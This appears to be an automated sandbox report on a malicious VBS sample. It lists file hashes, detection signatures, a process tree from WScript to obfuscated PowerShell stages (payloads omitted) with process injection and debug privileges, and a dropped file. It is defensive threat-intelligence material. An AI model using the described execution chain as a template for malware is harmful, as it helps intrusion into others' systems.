Analysis
  max time kernel: 146s
  max time network: 150s
  platform: windows7_x64
  resource: win7-20230220-en
  resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  submitted: 25-05-2023 13:13
  Static task: static1
  Behavioral task: behavioral1 (Sample: 002671299.vbs, Resource: win7-20230220-en)
  Behavioral task: behavioral2 (Sample: 002671299.vbs, Resource: win10v2004-20230221-en)
General
  Target: 002671299.vbs
  Size: 1.6MB
  MD5: ab9b3d4a26d471f3cab30e7b5fb1ebdd
  SHA1: 61b6ede9958ee0ae4a23e8c2f43da4b4c3eee69c
  SHA256: 0694f9298292cb06b0eae287f24b53d2ed824c16eec54bf73f775b9e8ad2a337
  SHA512: 9c769a40df6f6c7edec3be3065e8a3a20d7ce44e6cddcdb89de65b37ee6faeca1031a30a96a042db3054b7ce34cd9600063d1914abf29dccf77d1fe7d3acf802
  SSDEEP: 6144:Je05+M7U/Tk/aEaOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM:gE2
Malware Config
Signatures
  Blocklisted process makes network request (50 IoCs)
    flow  pid   Process
    4     1868  powershell.exe
    5     1868  powershell.exe
    6     1868  powershell.exe
    7     1868  powershell.exe
    8     1868  powershell.exe
    9     1868  powershell.exe
    11    1868  powershell.exe
    12    1868  powershell.exe
    13    1868  powershell.exe
    14    1868  powershell.exe
    15    1868  powershell.exe
    16    1868  powershell.exe
    17    1868  powershell.exe
    18    1868  powershell.exe
    19    1868  powershell.exe
    20    1868  powershell.exe
    21    1868  powershell.exe
    22    1868  powershell.exe
    23    1868  powershell.exe
    24    1868  powershell.exe
    25    1868  powershell.exe
    26    1868  powershell.exe
    27    1868  powershell.exe
    28    1868  powershell.exe
    29    1868  powershell.exe
    30    1868  powershell.exe
    31    1868  powershell.exe
    32    1868  powershell.exe
    33    1868  powershell.exe
    34    1868  powershell.exe
    35    1868  powershell.exe
    36    1868  powershell.exe
    37    1868  powershell.exe
    38    1868  powershell.exe
    39    1868  powershell.exe
    40    1868  powershell.exe
    41    1868  powershell.exe
    42    1868  powershell.exe
    43    1868  powershell.exe
    44    1868  powershell.exe
    45    1868  powershell.exe
    46    1868  powershell.exe
    47    1868  powershell.exe
    48    1868  powershell.exe
    49    1868  powershell.exe
    50    1868  powershell.exe
    51    1868  powershell.exe
    52    1868  powershell.exe
    53    1868  powershell.exe
    54    1868  powershell.exe

  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).

  Suspicious behavior: EnumeratesProcesses (2 IoCs)
    pid   Process
    764   powershell.exe
    1868  powershell.exe

  Suspicious use of AdjustPrivilegeToken (2 IoCs)
    description               pid   Process
    Token: SeDebugPrivilege   764   powershell.exe
    Token: SeDebugPrivilege   1868  powershell.exe

  Suspicious use of WriteProcessMemory (13 IoCs)
    description                        pid   Process         procid_target
    PID 1696 wrote to memory of 656    1696  WScript.exe     27
    PID 1696 wrote to memory of 656    1696  WScript.exe     27
    PID 1696 wrote to memory of 656    1696  WScript.exe     27
    PID 1696 wrote to memory of 1004   1696  WScript.exe     30
    PID 1696 wrote to memory of 1004   1696  WScript.exe     30
    PID 1696 wrote to memory of 1004   1696  WScript.exe     30
    PID 1696 wrote to memory of 764    1696  WScript.exe     31
    PID 1696 wrote to memory of 764    1696  WScript.exe     31
    PID 1696 wrote to memory of 764    1696  WScript.exe     31
    PID 764 wrote to memory of 1868    764   powershell.exe  33
    PID 764 wrote to memory of 1868    764   powershell.exe  33
    PID 764 wrote to memory of 1868    764   powershell.exe  33
    PID 764 wrote to memory of 1868    764   powershell.exe  33
Processes
  C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\002671299.vbs"
    PID: 1696
    Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c dir
      PID: 656
    C:\Windows\System32\cmd.exe
      Command line: cmd /c dir&echo ###RSHELL.EXE###
      PID: 1004
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated first-stage PowerShell script omitted>"
      PID: 764
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<hex-encoded second-stage PowerShell script omitted>"
        PID: 1868
        Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IUNE6OLCAZPMECYZ2SP5.temp
    Filesize: 7KB
    MD5: fdfb4ff8677080344ea01b8d12c432a7
    SHA1: 215265b5107831e68d08a1c87806e41ed40d79ea
    SHA256: 32213e00030ed166a3704ec60bf270aa3d5ead4f60b034798ed732d04fc552af
    SHA512: a84de34bb4142e2c8466cc42b9b6f29a7f6c6c2b95d49196a97a6909bceb9e4ab0bfd16d4f35bc84c38f3366440dde82d69b44c93858e5033ea77e411b9a9915